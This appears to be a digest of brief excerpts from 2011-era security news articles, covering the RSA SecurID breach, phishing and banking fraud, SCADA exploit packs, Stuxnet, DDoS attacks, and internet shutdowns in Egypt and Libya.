EU Agency Presents the First Report Ever on how to Measure IT Resilience



'....The European Network and Information Security Agency (ENISA) has published the 'Main Challenges and Recommendations on Network and Service Resilience Metrics' report, as well as a technical report.These are the first ever reports in Europe to address this area's lack of holistic review.......'





Serious new hole in Internet Banking system Dutch bank ING,1



'...."Cyber criminals have found a new way to place purchase orders on the internet andhave unsuspecting ING customers pay for the goods through PayPal. Using PayPal the crims can circumvent the ING used authentication method using so called TAN codes......'



Retaliatory Deterrence in Cyberspace

Eric Sterner



'....This article first examines cyber vulnerabilities then moves to cyberdeterrence alternatives. Finally it proposes a cyberdeterrent posture......'



That was quick: Four lines of code is all it takes for The New York Times' paywall to come tumbling down

Joshua Benton



'....The New York Times paywall is costing the newspaper $40-$50 million to design and construct, Bloomberg has reported......'



Paypal gets hit with a sophisticated phishing attack

Dean Wilson



'....The key difference between this attack and similar phishing attempts is that it locally stores the phishing webpage, rather than redirecting the user to a specific URL, which can be caught by anti-phishing measures built into many popular web browsers. Storing the website locally allows the attack to completely bypass browsers' anti-phishing defences......'



The anatomy of an Internet-driven revolution



'....In the analysis, the role of social networks became apparent, as people in Egypt took to their mobile phones for communication. Facebook, Twitter and other social-networking tools experienced a dramatic increase in page views during the recent revolution in Egypt......'



Agora SCADA+ Pack

Yuriy Gurkin



'....SCADA and related vulnerabilities are very special due to its sensitive nature and possible huge impact involved to successfull exploitation. The 22 modules include exploits for 11 zero-day vulnerabilities,SCADA Systems are also "hard to patch"......'



Listen: Secret Libya Psyops, Caught by Online Sleuths

Noah Shachtman



'....We know this, not because some Pentagon official said so, but because one Dutch radio geek is monitoring the airwaves for information about Operation Odyssey Dawn — and tweeting the surprisingly-detailed results......'





The RSA SecurID Problem

Steven M. Bellovin



'....As has been widely reported, RSA suffered a serious security breach aimed at its SecurID product. The SecurID is a major product in its space ("token authentication", rather than the commonly reported "two factor authentication"; see below); a security problem with it would be a major issue indeed. But what, precisely, is the problem RSA experienced? They haven't said, which of course has led to a lot of speculation. There are many possible scenarios here; some are serious and some are not. I'm going to lay out a few possibilities......'



Reverse Engineering RSA's "Statement"

Steve Gibson



'....RSA may not want to do the responsible thing because it would be very expensive for them. but given the only deductions possible from what little RSA has said in light of the technology, any company using RSA SecurID tokens should consider them completely compromised and should insist upon their immediate replacement.....'



UK resellers 'kept in dark' over RSA breach

Tom Espiner



'....RSA rival SecurEnvoy, which is co-run by ex-RSA employee Andrew Kemshall, said there was a possibility that keys for RSA SecurID tokens called 'seed records' may have been compromised. A seed record is 128 bits of data that RSA links to individual authentication tokens, and uses with an algorithm to generate pass numbers. Should seed records have been exposed to hackers, then SecurID products would only have a four-digit PIN to stop unknown hackers authenticating themselves as users, said Kemshall......'



RSA SecurID system hit by cyberattack

Elinor Mills



'....Information about RSA's SecurID authentication tokens — used by millions of people, including government and bank employees — was stolen during an "extremely sophisticated cyberattack", putting customers relying on them to secure their networks at risk......'


Top 10 Android Security Risks

Lisa Phifer



'....we consider today's biggest Android security risks and what can be done to mitigate them......'


IBM pays $10 mn to settle bribery complaint



'....The U.S. Securities and Exchanges Commission alleged employees of IBM Korea and a local joint venture with LG Electronics paid around $207,000 in bribes to South Korean government officials, according to court documents on Friday.......'


Microsoft urges Office users to block Flash Player attacks

Gregg Keizer



'....Microsoft yesterday urged users of older Office suites to install and run a complicated tool to protect themselves against ongoing attacks ......'


Anonymous goes up against US Air Force social media manipulation

Tim Greene



'....The international collective known as Anonymous is trying to figure out just what the US Air Force wants with software that can create and manage phony identities on Facebook, Twitter, LinkedIn and other social networks. Called Operation Metal Gear, the effort is aimed at shining light on software that that sets up phony Facebook, Twitter and other social media accounts and that helps operatives manage them so they seem like they were set up by real people, with the apparent object of gathering data about the actual real people they friend.......'


Chip & PIN is definitely broken - Credit Card skimming and PIN harvesting in an EMV world

Andrea Barisani, Daniele Bianco, Adam Laurie, Zac Franken



'....At the CanSecWest security conference held in Vancouver last week, four security researchers demonstrated the practicability of chip card skimming attacks – both with an insecure class of chip (SDA) and with a class that has been considered secure (DDA). EC and credit cards chipped according to EMV specifications are designed to hamper "skimming", an attack method which involves intercepting a user's card and PIN data.......'


Serious new hole in Internet Banking system Dutch bank ING,1



'....Cyber criminals have found a new way to place purchase orders on the internet andhave unsuspecting ING customers pay for the goods through PayPal. Using PayPal the crims can circumvent the ING used authentication method using so called TAN codes......'


Paypal gets hit with a sophisticated phishing attack

Dean Wilson



'....The attack, which is also being used to target Bank of America,Lloyds and TSB, is sent as part of an HTML attachment with unsolicited emails claiming to be legitimate. The key difference between this attack and similar phishing attempts is that it locally stores the phishing webpage, rather than redirecting the user to a specific URL......'


Hacker group Anonymous releases 'Bank of America emails' after WikiLeaks rumours

Victoria Ward



'....The leak was apparently made by a former employee of Balboa Insurance, a subsidiary of Bank of America which provides mortgage and car insurance for banks and home insurance for consumers......'



Alexandre Dulaunoy



'....traceroute-circl is an extended traceroute to support the activities of CSIRT (or CERT) operators. Usually CSIRT team have to handle incidents based on IP addresses received....'


Complexity Is Killing Us: A Security State of the Union With Eugene Spafford of CERIAS

Jon Chase



'....There's also been a great deal of attention about moving to cloud-based computing and compliance. So a lot of focus has moved away from the basics of security: building secure systems, securing enterprise, reducing complexity, and dealing with computer crime. As a result, we're moving farther away from the fundamentals that need to be addressed......' DDoS Attacks Primarily From China

Alexia Tsotsis



'....After recovering from the largest Distributed Denial of Service attack in the service's history ("multiple Gigabits per second and tens of millions of packets per second") yesterday morning, blog host was attacked again very early this morning......'


Saudi king did not offer $150 billion for Facebook

Emil Protalinski



'....The satirical website Dawn Wires recently posted an article titled "Saudi King to buy Facebook for $150 billion to end therevolt: Goldman Sachs to advise." It was filed under LoL News, and even concluded with the words "Sunday Humor."......'


Nigerian gets 22-year sentence for 419 fraud




'....A Nigerian man was sentenced to an effective 22 years in prison in the Germiston Regional Court yesterday.....'


Libyan authorities cut internet as civil war looms

Phil Muncaster



'....In what appears to be a desperate last attempt to disrupt widespread protests and halt civil war, the Libyan authorities appear again to have pulled the plug on all internet communications......'


Egypt: The Day the Secrets were Revealed



'....After the Egyptians succeeded in toppling Hosni Mubarak - they set their goal on cutting the hydra's tentacles. A full-waged war started last night against the dreaded State Security apparatus, known as Amn Dawla in Arabic......'


South Korea Web Sites Hit by Fresh Cyber Attack



'....The Korea and Communications Commission (KCC) said the "distributed denial-of-service (DDoS)" attacks resumed Saturday morning against 29 websites including those of government agencies, Internet portals and banks......'


Data Mining: How Companies Now Know Everything About You

Joel Stein,8599,2058114,00.html



'....You know how everything has seemed free for the past few years?It wasn't. It's just that no one told you that instead of using money......'



HBGary's Hoglund identifies lessons in Anonymous hack

Robert Lemos



'....Anyone with a cloud-based service needs to have an SLA (software license agreement) in the contract that says there is a priority,security hotline so that when there is a security event you have priority support, rather than what happened to me, which is that I got round-robinned to what appeared to be a call center in India. And I'm waiting on the phone and I can't do the technical magic tricks, jumping through the hoops that Google wanted me to jump through, to get them to listen to me. It took me forever to get technical staff on the phone on Sunday afternoon, so they could make the necessary changes so that Google would even start talking to me. And meanwhile, they are downloading my e-mail spool......'


A Look Inside the Bustling Cybercrime Marketplace

Noa Bar-Yosef



'.... Buying, selling, haggling and cheating all take place in these marketplaces. Each marketplace houses other specialized-markets of illegitimate goods. There's the credit cards market, the bot rental market, another one for viruses, and one more for the credentials – to name a few......'


Cyber Vigilantes: Should We Cheer or Fear Them?

Ted Samson



'....The ongoing drama starring hacker group Anonymous and beleaguered security company HBGary has taken a startling twist: In the wake of HBGary CEO Aaron Barr resigning, a group of House Democrats plans to use information gleaned from stolen electronic documents to launch an investigation of HBGary Federal ......'


Iran's Natanz nuclear facility recovered quickly from Stuxnet cyberattack

Joby Warrick



'....In a six-month period between late 2009 and last spring, U.N.officials watched in amazement as Iran dismantled more than 10 percent of the Natanz plant's 9,000 centrifuge machines used to enrich uranium. Then, just as remarkably, hundreds of new machines arrived at the plant to replace the ones that were lost.......'


Cyber attack hits Ottawa; probe focuses on IP addresses from China




'....According to senior federal officials, an attack that first became public at Treasury Board earlier this month also hit elsewhere in the federal public service, including Finance. An investigation into the attack is focused on Chinese IP addresses......'


NSA reveals its secret: No backdoor in encryption standard

William Jackson



'...."We're actually pretty good guys," said Dickie George. "We wanted to make sure we were as squeaky clean as possible." Besides, "I don't think we were good enough to sneak things in that you guys wouldn't have found," he told a crowd of crypto professionals and security officials......'


RSA: Cyber War Mass Hysteria Is Hindering Security

Eric Doyle



'...."Cyber war is a terrible metaphor," said the US government's cybersecurity czar Howard Schmidt. Don't make it something it's not." Internet attacks from hackers, spies and terrorist groups deserves serious attention, he said, but this should not be "to the extent of mass hysteria"......'


Microsoft bans open source from the Marketplace

Gareth Halfacree



'....Microsoft has raised the ire of the open source community with its Windows Marketplace licence by specifically refusing to allow software covered......'


Software Vulnerability Management at Microsoft



'....Tim Rains, Group Product Manager in Trustworthy Computing Communications, introduces an in-depth video series describing the processes Microsoft follows to protect customers and minimize disruption......'


America's power grid too vulnerable to cyberattack, US report finds

Mark Clayton



'...."Our testing revealed that such standards did not always include controls commonly recommended for protecting critical information systems," including tough password and log-in protections, the report said. The plodding implementation is "not adequate to ensure that systems-related risks to the Nation's power grid were mitigated or addressed in a timely manner.".....'


On-line threats a fundamental weakness in Australian security

John Blackburn and Gary Waters,



'....A Kokoda Foundation report, Optimising Australia's Response to the Cyber Challenge, to be released today has found that cyber security has become the fundamental weakness in Australia's national security, and that the threat is poorly understood by politicians.....'


Latest Updates on Day 7 of Protests in Egypt




'....A stream of Twitter updates by bloggers and journalists we're following is in the right column of this blog. Updates below mix alerts on breaking news with reports from other Web sites and video, photographs and eyewitness accounts posted on social networks......'


Evil on the Internet

Richard Clayton



'....Phishing websites collect banking credentials; mule recruitment websites entice people into money laundering; fake escrow sites defraud the winners of online auctions; fake banks hold the cash for fake African dictators; and there are even Ponzi scheme websites where (almost) everyone knows that they're a scam......'